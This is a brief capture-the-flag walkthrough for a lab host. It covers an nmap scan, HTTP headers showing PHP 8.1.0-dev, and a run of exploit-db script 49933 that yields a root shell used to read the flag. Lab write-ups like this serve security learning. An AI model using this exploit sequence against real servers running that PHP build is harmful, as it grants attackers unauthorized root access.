Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.254.40 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 14:39 BST
Nmap scan report for 10.10.254.40
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.24 seconds

Website

When visiting the site the headers revealed the site was running was running on PHP 8.1.0-dev. This is also shown in the nmap.

HTTP/1.1 200 OK
Host: 10.10.254.40
Date: Wed, 06 Aug 2025 13:48:44 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8

Looking on exploit-db we find there is an exploit for this that will get a shell. So we run the exploit, get a root shell and can grab the flag.

# python 49933.py                                              
Enter the full host url:
http://10.10.254.40

Interactive shell is opened on http://10.10.254.40 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ cat /flag.txt
flag{41****************************cb}